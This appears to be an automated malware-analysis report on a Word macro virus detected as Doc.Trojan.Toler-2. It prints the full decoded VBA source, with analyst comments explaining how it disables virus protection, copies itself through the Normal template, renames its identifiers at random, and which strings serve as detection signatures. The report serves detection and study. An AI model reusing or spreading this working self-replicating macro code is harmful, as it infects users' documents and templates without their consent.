MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that is triggered by the Document_Open event. This macro is designed to disable virus protection and execute further malicious code, likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Trojan.Toler-2' also indicates malicious intent.
Heuristics 3
-
ClamAV: Doc.Trojan.Toler-2 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Toler-2
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10479 bytes |

SHA-256: f113a6502a93b33a4606fab6ea3a0bf73d3995e1db4d908189d2acc7c9c6c77a
Preview script — First 1,000 lines of the extracted script
' Module attribute header as decoded by olevba; these lines are declarative,
' not executable code. VB_Base names Normal.ThisDocument and
' VB_TemplateDerived is True, i.e. this is the ThisDocument class module of a
' Word document derived from the Normal template.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Tolerance!
' Location record for the marker-delimited code region that this macro copies
' between modules. WflwZ fills it by scanning a module's lines:
'   DpkigbZ - 1-based line number of the start-marker comment (0 if absent)
'   DrvlZ   - number of lines from the start marker through the end marker
'             (0 if the end marker is absent)
'   QoijZ   - True when the module already contains a Document_Open handler
Private Type AeaZ
DpkigbZ As Integer
DrvlZ As Integer
QoijZ As Boolean
End Type
' Empty Document_Close handler; does nothing. It lies between the two marker
' lines, so FewpZ copies it along with the rest of the region.
Private Sub Document_Close()
End Sub
' Empty Document_New handler; does nothing. Also inside the copied region.
Private Sub Document_New()
End Sub
' Document_Open: fires when the document is opened. Compares the
' marker-delimited code region in this document with the one in the Normal
' template and copies whichever side is missing or differs, so the region
' moves between the user's template and the documents they open.
' Detection / hardening notes for analysts:
' - the strings that survive the identifier renaming done by FewpZ are the
'   two marker comments (see WflwZ) and the literal "MUD Forever! :-)";
' - Options.VirusProtection = False and the VBProject access below are strong
'   indicators in their own right; on current Office builds the VBProject
'   calls fail unless "Trust access to the VBA project object model" is
'   enabled, so leaving that setting off stops the copy step.
Private Sub Document_Open()
' Seed the RNG used by XfkqZ (name generation) and by the Rnd < 0.3 test below.
Randomize
' Switch off Word's built-in macro virus protection option.
Options.VirusProtection = False
Dim AsbyieZ As Object, JshshjsvZ As Object
' Code module of the first VBA component in this document and in Normal.
Set AsbyieZ = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Set JshshjsvZ = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
' NudZ locates the region in this document, EgacsZ the copy in Normal.
Dim NudZ As AeaZ, EgacsZ As AeaZ: NudZ = WflwZ(AsbyieZ): EgacsZ = WflwZ(JshshjsvZ)
' Normal has no end marker: copy document -> Normal and suppress the
' "save changes to Normal?" prompt so the write is not surfaced to the user.
If EgacsZ.DrvlZ = 0 Then
FewpZ AsbyieZ, JshshjsvZ, NudZ, EgacsZ
Options.SaveNormalPrompt = False
End If
' Document lacks the region, or both have it with different line counts
' (EgacsZ is not re-read after the copy above): copy Normal -> document.
If (NudZ.DrvlZ = 0) Or ((EgacsZ.DrvlZ <> 0) And (NudZ.DrvlZ <> EgacsZ.DrvlZ)) Then
FewpZ JshshjsvZ, AsbyieZ, EgacsZ, NudZ
' Otherwise, when Rnd < 0.3 (roughly 30% of opens), prepend a paragraph
' reading "MUD Forever! :-)" and save the document over itself.
ElseIf Rnd < 0.3 Then
ActiveDocument.Range(0, 0).InsertParagraphBefore
ActiveDocument.Range(0, 0).InsertBefore "MUD Forever! :-)"
ActiveDocument.SaveAs (ActiveDocument.FullName)
End If
End Sub
' Copy the marker-delimited region from CodeModule DpkigbZ into CodeModule
' XypmZ, after rewriting the internal identifiers to fresh random names so each
' copy reads differently. Only names change; structure and string literals
' (including the marker comments) are left intact, which is what a signature
' should key on.
'   DpkigbZ - source CodeModule          XypmZ - destination CodeModule
'   FromP   - region location in the source (from WflwZ)
'   ToP     - region location in the destination; only ToP.QoijZ is read
Private Sub FewpZ(DpkigbZ As Object, XypmZ As Object, FromP As AeaZ, ToP As AeaZ)
Dim FgoyZ As String, MemyZ
' Read DrvlZ lines starting at the start-marker line.
FgoyZ = DpkigbZ.Lines(FromP.DpkigbZ, FromP.DrvlZ)
' The 19 names that get rewritten: the Type and its members, the helper
' routines, and most parameters/locals. FromP, ToP, i and Index are not in
' the list and keep their names.
MemyZ = Array("XfkqZ", "AeaZ", "DpkigbZ", "XypmZ", "EaqayjZ", "DrvlZ", "QoijZ", "AsbyieZ", "JshshjsvZ", "NudZ", "EgacsZ", "FewpZ", "FgoyZ", "IqmbZ", "UedxnoZ", "UvubZ", "WflwZ", "HwvcxZ", "MemyZ")
' i is undeclared (no Option Explicit in view). HwvcxZ receives FgoyZ by
' reference (VBA default) and rewrites it in place; the parentheses around
' MemyZ(i) pass that argument by value. XfkqZ returns a name that does not
' already occur in FgoyZ.
For i = 0 To 18: HwvcxZ FgoyZ, (MemyZ(i)), XfkqZ(FgoyZ): Next i
' If the destination already has a Document_Open handler, clear the whole
' module first (presumably to avoid a duplicate handler), then append.
If ToP.QoijZ Then XypmZ.DeleteLines 1, XypmZ.CountOfLines
XypmZ.AddFromString FgoyZ
End Sub
' Generate a random identifier that does not yet occur anywhere in FgoyZ.
' Shape: up to 10 letters - the first uppercase A..Y, the rest lowercase
' a..y (Int(Rnd * 25) never yields the 26th letter) - followed by a literal
' "Z", and at least 3 characters in total. The identifiers seen in this sample
' (AeaZ, DpkigbZ, ...) already fit that shape, consistent with the sample
' being the output of an earlier pass; a "trailing-Z identifier" pattern is
' therefore a usable structural indicator.
' Returns the generated name; FgoyZ is only consulted for collisions.
Private Function XfkqZ(FgoyZ As String) As String
Dim IqmbZ As String: IqmbZ = ""
' Retry until the candidate is absent from FgoyZ and at least 3 chars long.
' On the first pass IqmbZ is "", and InStr with an empty search string
' returns a non-zero value for a non-empty FgoyZ, so the loop is entered.
While (InStr(FgoyZ, IqmbZ) <> 0) Or (Len(IqmbZ) < 3)
IqmbZ = ""
' Each of the 10 slots is filled with probability 1/2; i is undeclared.
For i = 1 To 10
If Rnd > 0.5 Then
' First chosen letter is uppercase, every later one lowercase.
If Len(IqmbZ) = 0 Then
IqmbZ = IqmbZ + Chr(Int(Rnd * 25 + 65))
Else: IqmbZ = IqmbZ + Chr(Int(Rnd * 25 + 97))
End If
End If
Next i
IqmbZ = IqmbZ + "Z"
Wend
XfkqZ = IqmbZ
End Function
' Replace every occurrence of UedxnoZ in FgoyZ with UvubZ, in place (FgoyZ is
' passed by reference, the VBA default). This is plain substring replacement
' with no word-boundary check, so a name that is a substring of another name
' would be rewritten inside it as well. Compare mode is whatever the module
' default is; no Option Compare is visible here.
' Note: the scan resumes at i, the start of the text just inserted, rather
' than after it. It appears to terminate only because the names XfkqZ produces
' (one uppercase initial, lowercase body, single trailing Z) cannot contain
' another such name - worth confirming if this analysis is reused.
' Index is undeclared and only ever incremented: a dead counter.
Private Sub HwvcxZ(FgoyZ As String, UedxnoZ As String, UvubZ As String)
Dim i As Long
i = 1
While InStr(i, FgoyZ, UedxnoZ) <> 0
i = InStr(i, FgoyZ, UedxnoZ)
' Splice: text before the match + replacement + text after the match.
FgoyZ = Left(FgoyZ, i - 1) + UvubZ + Mid$(FgoyZ, i + Len(UedxnoZ))
Index = Index + 1
Wend
End Sub
' Locate the marker-delimited region inside CodeModule EaqayjZ.
' Scans every line once and returns an AeaZ with:
'   DpkigbZ - number of the line whose text is exactly the start-marker
'             comment (0 if none)
'   DrvlZ   - line count from that line through the line whose text is
'             exactly the end-marker comment (0 if none)
'   QoijZ   - True if some line begins with "Private Sub Document_Open()"
' Both markers are string literals, so FewpZ's renaming leaves them alone and
' they stay constant across mutated copies - good signature material. The
' trailing comment on the End Function line below IS the end marker the
' comparison on the second If looks for, and must remain byte-exact.
Private Function WflwZ(EaqayjZ As Object) As AeaZ
WflwZ.DpkigbZ = 0
WflwZ.DrvlZ = 0
WflwZ.QoijZ = False
' i is undeclared (no Option Explicit in view).
For i = 1 To EaqayjZ.CountOfLines
If EaqayjZ.Lines(i, 1) = "' Tolerance!" Then WflwZ.DpkigbZ = i
If EaqayjZ.Lines(i, 1) = "End Function 'Tolerance!" Then WflwZ.DrvlZ = i - WflwZ.DpkigbZ + 1
If InStr(EaqayjZ.Lines(i, 1), "Private Sub Document_Open()") = 1 Then WflwZ.QoijZ = True
Next i
End Function 'Tolerance!
' Processing file: /opt/analyzer/scan_staging/c78387dbd5624dc1a0bad6d33c9887e0.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 10993 bytes
' Line #0:
' QuoteRem 0x0000 0x000B " Tolerance!"
' Line #1:
' Type (Private) AeaZ
' Line #2:
' DimImplicit
' VarDefn DpkigbZ (As Integer)
' Line #3:
' DimImplicit
' VarDefn DrvlZ (As Integer)
' Line #4:
' DimImplicit
' VarDefn QoijZ (As Boolean)
' Line #5:
' EndType
' Line #6:
' Line #7:
' FuncDefn (Private Sub Document_Close())
' Line #8:
' Line #9:
' EndSub
' Line #10:
' Line #11:
' FuncDefn (Private Sub Document_New())
' Line #12:
' Line #13:
' EndSub
' Line #14:
' Line #15:
' FuncDefn (Private Sub Document_Open())
' Line #16:
' ArgsCall Read 0x0000
' Line #17:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #18:
' Dim
' VarDefn AsbyieZ (As Object)
' VarDefn JshshjsvZ (As Object)
' Line #19:
' SetStmt
' LitDI2 0x0001
... (truncated)